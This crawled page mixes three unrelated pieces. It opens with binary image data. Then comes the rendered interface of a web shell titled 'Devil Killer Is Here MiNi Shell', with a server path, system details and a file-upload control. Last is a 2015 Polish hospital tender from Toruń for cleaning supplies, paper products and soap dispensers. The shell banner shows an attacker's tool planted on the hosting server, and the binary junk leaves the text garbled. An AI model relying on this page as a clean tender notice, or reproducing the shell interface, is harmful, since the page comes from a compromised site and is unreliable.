JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/197922-N-2015.html

<p class="kh_header"><b>Toruń: Dostawa środków czystości i koncentratów do mycia i czyszczenia, papieru toaletowego i ręczników papierowych oraz dozowników do mydła.</b><br>
<b>Numer ogłoszenia: 197922 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53-59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6101510, faks 56 6101682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości i koncentratów do mycia i czyszczenia, papieru toaletowego i ręczników papierowych oraz dozowników do mydła..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:<br>
* Zadanie Nr 1 - dostawa środków czystości i koncentratów do mycia i czyszczenia, tj.:<br>
1. Mydło do rąk w płynie, butelka 0,5 l - 60 l<br>
2. Płyn do naczyń, butelka 5 l - 780 l<br>
3. Płyn do naczyń, butelka 0,5 l - 2572 l<br>
4. Emulsja do czyszczenia, butelka 700 ml - 72 szt.<br>
5. Proszek do czyszczenia urządzeń sanitarnych, opakowanie 0,5 kg - 48 op.<br>
6. Krem do rąk, tubka 75 ml - 3324 szt.<br>
7. Płyn do mycia szyb z rozpylaczem, butelka 0,5 l - 108 szt.<br>
8. Płyn do WC, butelka 750 ml - 68 szt.<br>
9. Szampon do włosów, butelka 300 ml - 708 szt.<br>
10. Szampon do włosów dla dzieci, butelka 300 ml - 108 szt.<br>
11. Krem do golenia - 72 szt.<br>
12. Maszynki do golenia - 700 szt.<br>
13. Emulsja do mycia i pielęgnacji silnie zabrudzonych rąk (z dodatkiem pumeksu), usuwająca z dłoni zabrudzenia tj.: olej, smary, lakiery, farby, smołę, kleje itp. Emulsja przeznaczona do usuwania zabrudzeń o dużej intensywności z możliwością codziennego stosowania bez obawy uszkodzenia naskórka i dłoni, opakowanie 3, 78 l - 10 szt.<br>
14. Druciak - 48 szt.<br>
15. Zmywak gąbka 9,5x6,5cm x1cm - 672 szt.<br>
16. Denaturat, butelka 0,5 l - 48 szt.<br>
17. Koncentrat do posadzek wodoodpornych w szczególności do posadzek błyszczących i zabezpieczonych powłokami akrylowymi. Pozostawiający cienką powłokę, odporną na zabrudzenia, długotrwały i świeży zapach o wysokiej skuteczności mycia połączonej z doskonałymi właściwościami pielęgnacyjnymi. Nie zawierający wosków, mydła i pochodnych eteru. Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, pH 6,9-7,1 koncentratu w kolorze zielonym, stężenie 0,5 - 2%, opakowanie o pojemności 1 l - 192 l<br>
18. Koncentrat do wszystkich zmywalnych powierzchni takich jak: szkło, marmur, emalia, plastik, drewno. Pozostawiający długotrwały, świeży zapach, nie pozostawiający smug . Zawierający anionowe związki powierzchniowo czynne, etoksylowany alkohol tłuszczowy 1-2%, substancje zapachowe, alkiloeterosiarczany 1-2%, ph koncentratu 6,9- 7,1 ,w kolorze niebieskim, stężenie 0,5 - 2 %, opakowanie o pojemności 1 l - 48 l<br>
19. Koncentrat do wszystkich powierzchni odpornych na działanie kwasów, posiadający doskonałe właściwości w usuwaniu kamienia, osadów wapniowych i wszelkich zabrudzeń z powierzchni sanitarnych, pozostawiający długotrwały i świeży zapach. Nie uszkadzający czyszczonych powierzchni. Zawierający niejonowe związki powierzchniowo czynne, kwas amidosiarkowy 5-10%, etoksylowany alkohol tłuszczowy 2-5 %, substancje zapachowe, pH koncentratu 0,4-0,6, kolor czerwony, stężenie 0,5-2%, opakowanie o pojemności 1 l - 36 l<br>
20. Płyn do mycia butelek, smoczków bezpieczny dla dziecka, usuwający białka mleka, substancje zagęszczające nie zawierający barwników ani wybielaczy, nieperfumowany, konstrukcja płynna, bezbarwny, ph neutralne dla skóry, zawierający naturalne enzymy: proteazy i mannanazy, butelka 0,38 l - 450 l<br>
21. Ścierki jednorazowe w kolorze białym o wymiarach 32 x 39 cm, opakowanie 50 - 100 szt. - 21600 szt.<br>
22. Pianka do mycia niemowląt z możliwością stosowania u noworodków. Opakowanie dostosowane do systemu typu Dermados (dotyczy opakowań 400 ml), będących w posiadaniu zamawiającego<br>
opakowanie 200ml - 120 szt.<br>
opakowanie 400 ml - 132 szt.<br>
23. Oliwka dla niemowląt, opakowanie 200 ml - 216 szt.<br><br>
* Zadanie Nr 2 - dostawa papieru toaletowego i ręczników papierowych, tj.:<br>
1. Papier toaletowy na rolce, nie pylący o gramaturze powyżej 30 g/m2, szerokość rolki 9,6- 10 cm, waga rolki min 110 g, długość minimum 28m - 1248 rolek<br>
2. Ręcznik papierowy na rolce, pakowany po dwie sztuki, niepylący o szerokości min 22 cm, gramaturze min 40 g/m2 , długość rolki min 12 m - 480 rolek<br>
3. Ręczniki papierowe w rolce, białe do wycierania rąk bez perforacji dostosowany do dozownika Matic o wymiarach  wys. 37,2cm szer. 33,7cm gł. 20,3cm. Ręczniki dwuwarstwowe muszą być wykonane z włókien pierwotnych w technologii TAD oraz włókien przetworzonych.  Jaskrawość- białość powyżej 80%, metoda wybielania bez zawartości chloru. Długość rolki 150m w przeliczeniu na mb, wymiar odcinka 21x25 cm, średnica całkowita rolki 19cm, podstawowa gramatura nie mniejsza niż 23/18,5(g/m2) - 168 rolek<br> <br>
* Zadanie Nr 3 - dostawa dozowników do mydła, tj.:<br> 
1. Ścienne, łokciowe dozowniki do preparatów dezynfekcyjnych oraz mydła w płynie z:<br>
- możliwością dezynfekcji wszystkich elementów i regulacją dozowanego preparatu<br>
- wyjmowaną pompką i wyjmowanym wkładem dozownika,<br>
- dozowanie preparatu od góry pojemnika<br>
- regulacja dozowania 0,5 - 1,5 ml<br>
- możliwość demontażu dozownika bez konieczności użycia narzędzi<br>
- możliwość zamontowania tacki chroniącej przed zalaniem podłogi<br>
- możliwość zamontowania kolorowych ramion dozownika.<br>
Obudowa zewnętrzna dozownika:<br>
- wykonana z tworzywa sztucznego typu ABS (w kolorze białym), odpornego na częste stosowanie środków dezynfekcyjnych<br>
- o gładkiej, łatwej w utrzymaniu czystości powierzchni<br>
- z wizjerem informującym o zużyciu preparatu bez elementów metalowych i transparentnych.<br>
Otwieranie dozownika bez konieczności użycia kluczyka - 500 ml - 250 szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 33.76.10.00-2, 33.76.30.00-6, 39.51.42.00-0, 39.83.17.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest załączyć do oferty:<br>
a/ wykaz wykonanych min. 2 głównych dostaw środków czystościowych o wartości min. dla poszczególnych zadań:<br>
- Zadanie Nr 1 - 16.698,40zł,<br>
- Zadanie Nr 2 -   1.396,80zł,<br>
- Zadanie Nr 3 -   8.500,00zł brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączenia min. 2 dowodów, czy zostały wykonane należycie;<br>
Wykonawca składający ofertę na kilka  zadań musi wykazać się zrealizowanymi min. 2 dostawami o wymaganej wartości łącznej równej sumie tych zadań.<br>
Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie   uzyskać poświadczenia o należytym zrealizowaniu dostaw może złożyć oświadczenie.<br>
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w  wykazie dostaw zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów o ich należytym wykonaniu.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca zobowiązany jest załączyć w ofercie:<br>
a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:<br>
- Zadanie Nr 1 - 20.873,50zł<br>
- Zadanie Nr 2 -    1.746,00zł<br>
- Zadanie Nr 3 -  10.625,00zł<br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na  kilka zadań  musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie tych zadań.<br>
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie, że na oferowane wyroby posiada dokumentację potwierdzającą zgodność danego wyrobu lub procesu jego wytwarzania z zasadniczymi wymogami.<br>
b) dla wyrobów sklasyfikowanych jako niebezpieczne Zamawiający wymaga załączenia do oferty aktualnej karty charakterystyki preparatu niebezpiecznego zgodnie z Rozporządzeniem REACH 1907/2006/WE oraz WE 1272/2008 (CLP)<br>
c) próbki oferowanych wyrobów - min. po 1 opakowaniu lub 1 szt. z każdego asortymentu w opakowaniu handlowym.<br>
Wykonawca zobowiązany jest do dostarczenia próbek oferowanego przedmiotu zamówienia przed upływem terminu i godziny wyznaczonej na składanie ofert.<br>
Zamawiający zgodnie z art. 97 ust. 2 zwróci próbki na wniosek Wykonawcy, który należy dołączyć do oferty.<br>
d) instrukcję użytkowania w języku polskim dla oferowanego przedmiotu zamówienia  -  dotyczy Zadania Nr 1 poz. 17-19.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;<br>
b/ oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.<br>
2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera, ul. Św. Józefa 53-59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 09:30, miejsce: Kancelaria Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera, ul. Św. Józefa 53-59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> * Jeżeli Wykonawcy składają ofertę wspólną (konsorcjum, spółka cywilna) wówczas oświadczenia i dokumenty dotyczące braku wykluczenia z postępowania muszą złożyć wszyscy wykonawcy wchodzący w skład konsorcjum czy tworzący spółkę cywilną.<br>
** Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.<br> 
*** Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art.26 ust.2b ustawy - Prawo zamówień  publicznych, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br>
**** Zobowiązania podmiotu trzeciego z art. 26 ust. 2b ustawy - Pzp należy złożyć w oryginale i podpisane przez osoby uprawnione wynikające z zasad reprezentacji albo z pełnomocnictwa.<br>
***** Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów i oświadczeń będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa środków czystości i koncentratów do mycia i czyszczenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mydło do rąk w płynie, butelka 0,5 l - 60 l<br>
2. Płyn do naczyń, butelka 5 l - 780 l<br>
3. Płyn do naczyń, butelka 0,5 l - 2572 l<br>
4. Emulsja do czyszczenia, butelka 700 ml - 72 szt.<br>
5. Proszek do czyszczenia urządzeń sanitarnych, opakowanie 0,5 kg - 48 op.<br>
